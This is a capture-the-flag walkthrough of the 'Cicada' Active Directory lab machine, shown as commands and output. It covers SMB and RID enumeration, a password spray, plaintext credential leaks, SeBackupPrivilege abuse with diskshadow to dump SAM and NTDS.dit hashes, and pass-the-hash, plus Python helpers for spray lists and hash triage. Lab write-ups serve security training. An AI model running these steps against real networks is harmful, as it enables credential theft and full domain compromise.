Cicada - Walkthrough

Cicada is an easy-difficulty Windows machine that focuses on beginner Active Directory enumeration and exploitation. Players enumerate the domain, identify users, navigate shares, uncover plaintext passwords stored in files, execute a password spray, and use the SeBackupPrivilege to achieve full system compromise.

Reconnaissance

Nmap

We start with a standard service scan against the target:

sudo nmap -sC -sV -Pn 10.129.231.149 -oN cicada.nmap
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)

Kerberos (88) and LDAP (389/636/3268/3269) confirm we're dealing with a Domain Controller. The LDAP service info and the SSL certificate's commonName both point to the domain cicada.htb and the host CICADA-DC, so we register both in /etc/hosts:

echo "10.129.231.149 cicada.htb CICADA-DC CICADA-DC.cicada.htb" | sudo tee -a /etc/hosts

There is no web server exposed, so with a Domain Controller in front of us the natural next step is SMB enumeration.

SMB — Anonymous / Guest Access

An unauthenticated (null) session is rejected outright, but the built-in guest account with a blank password succeeds. crackmapexec is end-of-life; its actively maintained successor netexec (nxc) accepts the same syntax, and the two are used interchangeably throughout this box.

crackmapexec smb cicada.htb --shares
SMB   cicada.htb   445   CICADA-DC   [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
crackmapexec smb cicada.htb -u 'guest' -p '' --shares
SMB   cicada.htb   445   CICADA-DC   [+] cicada.htb\guest:
SMB   cicada.htb   445   CICADA-DC   [+] Enumerated shares
Share      Permissions   Remark
-----      -----------   ------
ADMIN$                   Remote Admin
C$                       Default share
DEV
HR         READ
IPC$       READ          Remote IPC
NETLOGON                 Logon server share
SYSVOL                   Logon server share

guest lands us read access on HR. DEV is listed but with an empty Permissions column, meaning we can see that the share exists but cannot read it yet; we'll come back to it once we have proper credentials.

HR Share — Default Password Disclosure

We connect with smbclient and grab the only file in the share:

smbclient //cicada.htb/HR -N
smb: \> get "Notice from HR.txt"
Notice from HR.txt
Dear new hire!
 
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our
security protocols, it's essential that you change your default password to
something unique and secure.
 
Your default password is: Cicada$M6Corpb*@Lp#nZp!8
 
To change your password:
 
1. Log in to your Cicada Corp account using the provided username and the
default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change
Password".
4. Follow the prompts to create a new password. Make sure your new password is
strong, containing a mix of uppercase letters, lowercase letters, numbers, and
special characters.
5. After changing your password, make sure to save your changes.
 
Remember, your password is a crucial aspect of keeping your account secure.
Please do not share your password with anyone, and ensure you use a complex
password.
 
If you encounter any issues or need assistance with changing your password,
don't hesitate to reach out to our support team at [email protected].
 
Thank you for your attention to this matter, and once again, welcome to the
Cicada Corp team!
 
Best regards,
Cicada Corp

This is a classic onboarding-document leak: the notice hands out a default domain password, Cicada$M6Corpb*@Lp#nZp!8, to every new hire, with no guarantee that everyone actually changed it as instructed. That makes it an excellent candidate for a password spray, but first we need a list of valid usernames to try it against.

Domain User Enumeration — RID Cycling

Every AD object (user, group, or machine account) has a unique SID (Security Identifier), formed by appending a RID (Relative Identifier) to the domain SID. RIDs are allocated sequentially and never reused, and, critically, the LSA lookup call that resolves a SID back to a name works over any SMB session, including the guest session we already have, with no special privilege required. So we can walk RIDs upward from the well-known built-ins (500 Administrator, 501 Guest, 502 krbtgt) through the 1000+ range where domain-created objects live and resolve every object in the domain, usernames included. netexec has a built-in module for this:

nxc smb 10.129.231.149 -u '.' -p '' --rid-brute
SMB   10.129.231.149   445   CICADA-DC   [+] cicada.htb\.: (Guest)
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Only the SidTypeUser entries matter for a spray; groups and aliases have no password to guess. Of the nine user entries, four are built-in or machine accounts (Administrator, Guest, krbtgt, and the CICADA-DC$ machine account) and the remaining five (john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars) are the human users we actually want to spray. The gap at RID 1107 is also worth a glance: since RIDs are never reused, it is most likely a deleted object.

The same result can be obtained with Impacket's lookupsid.py, piping the SidTypeUser entries straight into a wordlist:

impacket-lookupsid 'cicada.htb/guest'@cicada.htb -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > users.txt
users.txt
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

The first four entries are the built-in and machine accounts we skip for the spray; the remaining five are the human users worth targeting.
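As an added example (not code from this walkthrough, netexec or impacket), here is the parsing and filtering that the grep/sed one-liner does by hand, generalised to both tools' output formats, together with the SID composition described above and a RID-gap check. The sample output is a constructed subset of the listing above; the domain SID in the usage call is a placeholder, since the real one is not shown on this page.

```python
"""Build a spray list from RID-cycling output. Added example; not netexec or impacket code."""
import re

# Matches impacket-lookupsid lines and the tail of nxc --rid-brute lines alike:
#   "1104: CICADA\john.smoulder (SidTypeUser)"
RID_LINE = re.compile(r"(\d+):\s+([^\\\s]+)\\(.+?)\s+\((SidType\w+)\)")

# Constructed sample: a subset of the listing above, first line in nxc's prefixed format
SAMPLE = r"""
SMB  10.129.231.149  445  CICADA-DC  500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
513: CICADA\Domain Users (SidTypeGroup)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)
"""


def parse_rid_output(text):
    """(rid, domain, name, sidtype) for every resolved RID in the tool output."""
    rows = []
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def build_sid(domain_sid, rid):
    """An object's SID is the domain SID with its RID appended as the final sub-authority."""
    return f"{domain_sid}-{rid}"


def classify(rid, name, sidtype):
    if sidtype != "SidTypeUser":
        return "group"       # groups and aliases have no password to spray
    if name.endswith("$"):
        return "machine"     # computer accounts: long random passwords, never spray
    if rid < 1000:
        return "builtin"     # 500 Administrator, 501 Guest, 502 krbtgt
    return "human"


def spray_targets(text):
    """Human user accounts only, in RID order: the contents of users.txt worth spraying."""
    rows = sorted(parse_rid_output(text))
    return [name for rid, _, name, st in rows if classify(rid, name, st) == "human"]


def rid_gaps(text):
    """Unallocated RID ranges among domain-created objects (RID >= 1000). RIDs are never
    reused, so a gap is a deleted object or one the lookup could not resolve. The
    1001-1100 gap is normal: the first DC takes 1000 and the next objects start at 1101."""
    rids = sorted({r for r, _, _, _ in parse_rid_output(text) if r >= 1000})
    return [(lo + 1, hi - 1) for lo, hi in zip(rids, rids[1:]) if hi - lo > 1]


if __name__ == "__main__":
    for name in spray_targets(SAMPLE):
        print(name)
    print("gaps:", rid_gaps(SAMPLE))
    # "S-1-5-21-1-2-3" is a placeholder: the real domain SID is not shown on this page
    print(build_sid("S-1-5-21-1-2-3", 1104))
```

Feeding it the full rid-brute listing instead of the sample reproduces users.txt minus the four accounts we skip, and the gap list makes the missing 1107 stand out without reading the RIDs one by one.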

Foothold

Password Spraying

Before spraying, check the domain lockout policy (netexec's --pass-pol reads it with the same guest session) so the spray cannot lock anyone out; a single password tried once per user, as here, stays well under any sane threshold. We spray the default password from the HR notice against every user we just enumerated:

crackmapexec smb cicada.htb -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\Guest:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\CICADA-DC$:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB   cicada.htb   445   CICADA-DC   [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

michael.wrightson is the only [+] (success) among six STATUS_LOGON_FAILURE results: he never rotated the default password out. david.orelious and emily.oscars do not appear because crackmapexec and netexec stop at the first valid credential unless --continue-on-success is passed. We now have a valid, if low-privilege, domain account.

AD Description Field — Plaintext Password Disclosure

michael.wrightson has no additional share access, but valid domain credentials let us enumerate the full user list, including each account's description field, which administrators sometimes (mis)use as a scratchpad. netexec prints the same data as a table with a Description column, which is easier to scan than crackmapexec's one-line-per-user dump shown here:

crackmapexec smb cicada.htb -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB   cicada.htb   445   CICADA-DC   cicada.htb\emily.oscars           badpwdcount: 0 desc:
SMB   cicada.htb   445   CICADA-DC   cicada.htb\david.orelious         badpwdcount: 0 desc: Just in case I forget my password is aRt$Lp#7t*VQ!3
SMB   cicada.htb   445   CICADA-DC   cicada.htb\michael.wrightson      badpwdcount: 0 desc:
SMB   cicada.htb   445   CICADA-DC   cicada.htb\sarah.dantelia         badpwdcount: 1 desc:
SMB   cicada.htb   445   CICADA-DC   cicada.htb\john.smoulder          badpwdcount: 1 desc:

david.orelious left his password, aRt$Lp#7t*VQ!3, in plaintext right in the AD description field. This field is meant for free-text notes about the account and is readable by any authenticated user (over LDAP as well as SAMR), which is exactly why it's such a commonly misused scratchpad for "just in case I forget" notes.

DEV Share — Backup Script

Re-checking share access with David's credentials, the DEV share now grants read access:

crackmapexec smb cicada.htb -u david.orelious -p 'aRt$Lp#7t*VQ!3' --shares
Share   Permissions   Remark
-----   -----------   ------
DEV     READ
HR      READ

DEV goes from listed-but-unreadable to READ with David's credentials, so that's our next target:

smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
smb: \> get Backup_script.ps1
Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
 
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

This is a backup script that zips C:\smb to D:\Backup and, so that it can run unattended, builds a PSCredential from a hardcoded plaintext password: Q!3@Lp#M6b*7t*Vt, for emily.oscars. (The $credentials object is never actually used by Compress-Archive, which only makes the hardcoding more careless.) Automating a task like this without a proper credential vault is a very common real-world mistake.

WinRM Access

emily.oscars is a member of the Remote Management Users group, so we connect directly with Evil-WinRM:

evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i cicada.htb
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cat user.txt

User flag: 6a039bc32a912d2ae6303066bb94e642

Post-Exploitation

Privilege Enumeration

We check what rights the current token carries:

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
 
Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeBackupPrivilege and its counterpart SeRestorePrivilege are what matter here. Both exist so that trusted backup software can read and write any file regardless of its ACL, including files that are normally access-restricted, such as the registry hives that back the SAM database. Granting them to an ordinary user account is effectively granting local admin (and on a Domain Controller, domain admin), since it turns "backup" into "read anything I want."

Privilege Escalation

SeBackupPrivilege Abuse — Dumping the Local SAM

The most direct way to weaponize SeBackupPrivilege is to use the built-in reg save command to export the SAM and SYSTEM registry hives to disk. SAM stores the local accounts and their NTLM hashes; SYSTEM stores the boot key needed to decrypt them.

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\sam sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\system system
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sam
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download system

With both files local, Impacket's secretsdump.py decrypts the hashes offline:

impacket-secretsdump -sam sam -system system local
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Each line follows username:rid:lmhash:nthash. The lmhash field (aad3b435...) is the constant value for an empty LM hash (modern Windows no longer computes or stores real LM hashes), so the part we actually care about is the nthash. The Administrator entry gives us the NTLM hash 2b87e7c93a3e8a0ea4a581937016f341, usable for authentication as-is via Pass-the-Hash, no cracking required. One caveat: on a Domain Controller the local SAM holds the DSRM (Directory Services Restore Mode) administrator, not the domain Administrator, so a SAM hash is not guaranteed to work against the domain. On this box the two happen to be identical, as the NTDS dump further down confirms.

Pass-the-Hash

NTLM hashes are usable for authentication without ever recovering the plaintext password. We pass it straight to Evil-WinRM:

evil-winrm -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 -i cicada.htb
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt

Root flag: 59db75e16bd4c1c497304f8438ecf1b3

Going Further — Full Domain Compromise via Volume Shadow Copy

The SAM hive only yields local account hashes. Since CICADA-DC is a Domain Controller, the domain account database actually lives in NTDS.dit under C:\Windows\NTDS. reg save can't help here, because it only exports registry hives, and even a backup-semantics read of the file fails, because LSASS holds NTDS.dit open exclusively for as long as the directory service is running.

The standard way around this is to abuse SeBackupPrivilege together with the Volume Shadow Copy Service: creating a shadow copy gives us a frozen, read-only snapshot of the volume that bypasses the file lock entirely. We drive this with diskshadow, a built-in Windows utility, using a script:

diskshadow.txt
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

The add volume line selects C: as the volume to snapshot, and the expose line is the actual payoff: it mounts that frozen snapshot as a brand-new drive letter, E:, that we can read from freely. This technique is documented in Elevating Privileges with SeBackupPrivilege on Windows, which is where this diskshadow script comes from.

The one catch: diskshadow expects DOS-style (\r\n) line endings, and silently fails to parse a script written with plain Unix (\n) endings. xxd makes the difference obvious — every 0a (LF) needs to become 0d0a (CRLF):

xxd diskshadow.txt
00000000: 7365 7420 7665 7262 6f73 6520 6f6e 0a73  set verbose on.s
00000010: 6574 206d 6574 6164 6174 6120 433a 5c57  et metadata C:\W
00000020: 696e 646f 7773 5c54 656d 705c 6d65 7461  indows\Temp\meta
00000030: 2e63 6162 0a73 6574 2063 6f6e 7465 7874  .cab.set context
00000040: 2063 6c69 656e 7461 6363 6573 7369 626c   clientaccessibl
00000050: 650a 7365 7420 636f 6e74 6578 7420 7065  e.set context pe
00000060: 7273 6973 7465 6e74 0a62 6567 696e 2062  rsistent.begin b
00000070: 6163 6b75 700a 6164 6420 766f 6c75 6d65  ackup.add volume
00000080: 2043 3a20 616c 6961 7320 6364 7269 7665   C: alias cdrive
00000090: 0a63 7265 6174 650a 6578 706f 7365 2025  .create.expose %
000000a0: 6364 7269 7665 2520 453a 0a65 6e64 2062  cdrive% E:.end b
000000b0: 6163 6b75 700a                           ackup.

The first row shows it plainly: on 0a 73, a bare 0a between on and set. We convert with unix2dos and dump the same file again:

unix2dos diskshadow.txt
xxd diskshadow.txt
00000000: 7365 7420 7665 7262 6f73 6520 6f6e 0d0a  set verbose on..
00000010: 7365 7420 6d65 7461 6461 7461 2043 3a5c  set metadata C:\
00000020: 5769 6e64 6f77 735c 5465 6d70 5c6d 6574  Windows\Temp\met
00000030: 612e 6361 620d 0a73 6574 2063 6f6e 7465  a.cab..set conte
00000040: 7874 2063 6c69 656e 7461 6363 6573 7369  xt clientaccessi
00000050: 626c 650d 0a73 6574 2063 6f6e 7465 7874  ble..set context
00000060: 2070 6572 7369 7374 656e 740d 0a62 6567   persistent..beg
00000070: 696e 2062 6163 6b75 700d 0a61 6464 2076  in backup..add v
00000080: 6f6c 756d 6520 433a 2061 6c69 6173 2063  olume C: alias c
00000090: 6472 6976 650d 0a63 7265 6174 650d 0a65  drive..create..e
000000a0: 7870 6f73 6520 2563 6472 6976 6525 2045  xpose %cdrive% E
000000b0: 3a0d 0a65 6e64 2062 6163 6b75 700d 0a    :..end backup..

The first row now reads on 0d0a 73: every line break in the file gained a 0d byte, growing the file from 0xb6 to 0xbf bytes (9 extra bytes, one per line) for the same 9 lines of content. Only now will diskshadow /s parse the script correctly.
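The same conversion and check in code, as an added example that is not from the walkthrough or the linked article: it serialises the nine-line script above with CRLF endings, does not double-convert a file that is already correct, and reports any bare LF the way the xxd inspection does by eye.

```python
"""Write a diskshadow script with CRLF endings. Added example; not from the walkthrough."""

# The nine-line script shown above, as a Unix editor would hold it (no CR anywhere)
DISKSHADOW_LINES = [
    "set verbose on",
    "set metadata C:\\Windows\\Temp\\meta.cab",
    "set context clientaccessible",
    "set context persistent",
    "begin backup",
    "add volume C: alias cdrive",
    "create",
    "expose %cdrive% E:",
    "end backup",
]


def bare_lf_offsets(data: bytes):
    """Offsets of every 0a not preceded by 0d: what the xxd inspection above hunts for by eye."""
    return [i for i, b in enumerate(data) if b == 0x0A and (i == 0 or data[i - 1] != 0x0D)]


def to_crlf(data: bytes) -> bytes:
    """Normalise LF, CRLF or lone CR to CRLF. Running it twice changes nothing, unlike a
    naive replace of LF with CRLF, which turns an existing CRLF into CR CR LF."""
    return data.replace(b"\r\n", b"\n").replace(b"\r", b"\n").replace(b"\n", b"\r\n")


def render_script(lines, crlf=True) -> bytes:
    """Serialise the script; crlf=False reproduces the broken file diskshadow silently rejects."""
    data = ("\n".join(lines) + "\n").encode("ascii")
    return to_crlf(data) if crlf else data


if __name__ == "__main__":
    unix = render_script(DISKSHADOW_LINES, crlf=False)
    dos = render_script(DISKSHADOW_LINES)
    print(f"LF version:   {len(unix):#x} bytes, bare LFs at {bare_lf_offsets(unix)}")
    print(f"CRLF version: {len(dos):#x} bytes, bare LFs at {bare_lf_offsets(dos)}")
    with open("diskshadow.txt", "wb") as fh:   # ready to upload through Evil-WinRM
        fh.write(dos)
```

Writing the bytes yourself avoids the round trip through unix2dos entirely, and the bare-LF check is a useful pre-upload assertion for any script that a Windows tool will parse.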

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload diskshadow.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> diskshadow /s diskshadow.txt

This creates a shadow copy of C: and exposes it as a new E: drive. (The prompts show this run from the Administrator session obtained above; the technique itself relies only on the backup rights emily.oscars already had.) NTDS.dit is now readable through the snapshot, so we copy it out with robocopy, whose /b switch opens the file with backup semantics:

*Evil-WinRM* PS C:\Users\Administrator\Documents> robocopy /b E:\Windows\ntds . ntds.dit
*Evil-WinRM* PS C:\Users\Administrator\Documents> download ntds.dit

We already have the SYSTEM hive from earlier, so secretsdump.py can decrypt the full domain database, including Kerberos keys for every account:

secretsdump.py local -system system -ntds ntds.dit
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: f954f575c626d6afe06c2b80cc2185e6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\john.smoulder:1104:aad3b435b51404eeaad3b435b51404ee:0d33a055d07e231ce088a91975f28dc4:::
cicada.htb\sarah.dantelia:1105:aad3b435b51404eeaad3b435b51404ee:d1c88b5c2ecc0e2679000c5c73baea20:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
krbtgt:aes256-cts-hmac-sha1-96:357f15dd4d315af47ac63658c444526ec0186f066ad9efb46906a7308b7c60c8
[*] Cleaning up...

This dump is a strictly stronger foothold than the local SAM dump. Administrator shows the same NTLM hash we already had, but krbtgt is new: its key signs every Kerberos ticket in the domain, which is what makes Golden Ticket forgery possible. The Kerberos keys section goes a step further and gives the AES256 keys for both accounts. A ticket forged from the NTLM hash is RC4-encrypted, which stands out in a domain that has moved to AES and is rejected outright where RC4 has been disabled; the AES keys let a forged ticket look like every legitimate one.
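To make the hash format in both dumps concrete, here is an added triage script (not impacket code; the MD4 is a from-scratch RFC 1320 implementation) that parses secretsdump output from the SAM dump earlier and the NTDS dump above, flags empty NT hashes, real LM hashes and the same NT hash reused across accounts, and checks whether any dumped NT hash is simply the NT hash (MD4 over the UTF-16LE password) of a plaintext we already found on this box. The sample lines are copied from the dumps on this page.

```python
"""Triage secretsdump output. Added example; the MD4 below is a from-scratch RFC 1320 implementation."""
import re
import struct
from collections import defaultdict

MASK = 0xFFFFFFFF
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4(""): the NT hash of an empty password
KNOWN_PLAINTEXTS = ["Cicada$M6Corpb*@Lp#nZp!8", "aRt$Lp#7t*VQ!3", "Q!3@Lp#M6b*7t*Vt"]

# Sample lines copied from the two dumps on this page (non-hash lines left in on purpose)
SAM_DUMP = r"""
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
NTDS_DUMP = r"""
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
CICADA-DC$:1000:aad3b435b51404eeaad3b435b51404ee:188c2f3cb7592e18d1eae37991dee696:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3779000802a4bb402736bee52963f8ef:::
cicada.htb\michael.wrightson:1106:aad3b435b51404eeaad3b435b51404ee:b222964c9f247e6b225ce9e7c4276776:::
cicada.htb\david.orelious:1108:aad3b435b51404eeaad3b435b51404ee:ef0bcbf3577b729dcfa6fbe1731d5a43:::
cicada.htb\emily.oscars:1601:aad3b435b51404eeaad3b435b51404ee:559048ab2d168a4edf8e033d43165ee5:::
Administrator:aes256-cts-hmac-sha1-96:e47fd7646fa8cf1836a79166f5775405834e2c060322d229bc93f26fb67d2be5
"""


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(regs, func, X, order, shifts, const):
    # Step i rewrites register (-i mod 4) from the other three, in the order RFC 1320 lists them
    for i, k in enumerate(order):
        j = (-i) % 4
        x, y, z = regs[(j + 1) % 4], regs[(j + 2) % 4], regs[(j + 3) % 4]
        regs[j] = _lrot((regs[j] + func(x, y, z) + X[k] + const) & MASK, shifts[i % 4])


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)              # bit length, little-endian
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = list(struct.unpack("<16I", msg[off:off + 64]))
        regs = list(state)
        _md4_round(regs, F, X, range(16), (3, 7, 11, 19), 0)
        _md4_round(regs, G, X, [(i % 4) * 4 + i // 4 for i in range(16)], (3, 5, 9, 13), 0x5A827999)
        _md4_round(regs, H, X, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1)
        state = [(s + r) & MASK for s, r in zip(state, regs)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4 of the UTF-16LE password, no salt: identical passwords give identical hashes."""
    return md4(password.encode("utf-16le")).hex()


HASH_LINE = re.compile(r"^(?:[^\\:\s]+\\)?([^:\s]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::")


def parse_dump(text, source):
    """user:rid:lmhash:nthash::: lines only; Kerberos-key and status lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            rows.append({"source": source, "user": m.group(1), "rid": int(m.group(2)),
                         "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return rows


def triage(rows, known_plaintexts):
    rainbow = {nt_hash(p): p for p in known_plaintexts}
    by_nt, findings = defaultdict(list), []
    for r in rows:
        tag = f"{r['source']}:{r['user']}"
        by_nt[r["nt"]].append(tag)
        if r["nt"] == EMPTY_NT:
            findings.append((tag, "empty NT hash: blank password (typically a disabled built-in)"))
        if r["lm"] != EMPTY_LM:
            findings.append((tag, "real LM hash stored: legacy setting, crack it first"))
        if r["nt"] in rainbow:
            findings.append((tag, f"NT hash equals NT hash of known plaintext {rainbow[r['nt']]!r}"))
    for nt, tags in by_nt.items():
        if len(tags) > 1 and nt != EMPTY_NT:
            findings.append((", ".join(tags), "identical NT hash: same password on several accounts"))
    return findings


if __name__ == "__main__":
    rows = parse_dump(SAM_DUMP, "sam") + parse_dump(NTDS_DUMP, "ntds")
    for who, why in triage(rows, KNOWN_PLAINTEXTS):
        print(f"{who}: {why}")
```

The reuse check is what surfaces the SAM-versus-NTDS Administrator coincidence noted earlier, and the plaintext check tells you which dumped accounts you could already have logged into without cracking anything.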

The Administrator hash alone is already enough to confirm full control. netexec flags the host as pwned:

